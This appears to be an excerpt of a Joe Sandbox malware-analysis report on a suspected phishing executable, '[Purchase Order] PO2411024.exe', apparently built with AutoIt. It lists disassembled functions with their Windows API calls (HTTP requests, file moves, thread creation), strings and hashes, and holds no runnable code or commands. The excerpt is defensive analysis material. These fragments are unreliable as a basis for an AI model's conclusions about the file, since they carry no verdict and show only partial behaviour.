                                                    • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memcmp
                                                    • String ID: '$\$h
                                                    • API String ID: 2205784470-1303700344
                                                    • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                    • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                    • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                    • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                    Strings
                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                    • API String ID: 2441338619-1568723262
                                                    • Opcode ID: b8c3366479ac5ee96e7d694e1c6d037b27c933f553c4e95492a52c6e994464b6
                                                    • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                    • Opcode Fuzzy Hash: b8c3366479ac5ee96e7d694e1c6d037b27c933f553c4e95492a52c6e994464b6
                                                    • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID: @COM_EVENTOBJ
                                                    • API String ID: 327565842-2228938565
                                                    • Opcode ID: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                    • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                    • Opcode Fuzzy Hash: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                    • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                    APIs
                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                    • String ID: H
                                                    • API String ID: 3613100350-2852464175
                                                    • Opcode ID: bac023c95b3754fe6106274974d354ccc3a5a04b9930adb03413d9a67926b190
                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                    • Opcode Fuzzy Hash: bac023c95b3754fe6106274974d354ccc3a5a04b9930adb03413d9a67926b190
                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1291720006-3916222277
                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                    • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID: 0$2
                                                    • API String ID: 93392585-3793063076
                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                    • String ID: crts
                                                    • API String ID: 586820018-3724388283
                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,0040F545,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,004A90E8,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,?,0040F545), ref: 0041013C
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2326526234-1173974218
                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                    APIs
                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                    • _wcslen.LIBCMT ref: 004335F2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                    • String ID: \
                                                    • API String ID: 321622961-2967466578
                                                    • Opcode ID: 8546d23a8c82eb956732e680471f06bdad33b1bbbc9f0c28737d2518fddb1d69
                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                    • Opcode Fuzzy Hash: 8546d23a8c82eb956732e680471f06bdad33b1bbbc9f0c28737d2518fddb1d69
                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: f7e1481b40c6ecf3049f237ff01212b51241ebf6b13818ea7d03055555a8b88c
                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                    • Opcode Fuzzy Hash: f7e1481b40c6ecf3049f237ff01212b51241ebf6b13818ea7d03055555a8b88c
                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                    • __lock.LIBCMT ref: 00417981
                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                    • __lock.LIBCMT ref: 004179A2
                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                    • String ID: KERNEL32.DLL$pI
                                                    • API String ID: 637971194-197072765
                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_malloc
                                                    • String ID:
                                                    • API String ID: 1938898002-0
                                                    • Opcode ID: fdff623136200eae9aa9e71cee04e345f824e4a9840053947a11f9c92b048ded
                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                    • Opcode Fuzzy Hash: fdff623136200eae9aa9e71cee04e345f824e4a9840053947a11f9c92b048ded
                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                    • _memmove.LIBCMT ref: 0044B555
                                                    • _memmove.LIBCMT ref: 0044B578
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                    • String ID:
                                                    • API String ID: 2737351978-0
                                                    • Opcode ID: dabd869e6285a95d13f2c7c4e530d0ff130a55ee5e8c2b39387b3ad523f30327
                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                    • Opcode Fuzzy Hash: dabd869e6285a95d13f2c7c4e530d0ff130a55ee5e8c2b39387b3ad523f30327
                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                    • __getptd.LIBCMT ref: 00415253
                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                    • _free.LIBCMT ref: 0041529E
                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 3638380555-0
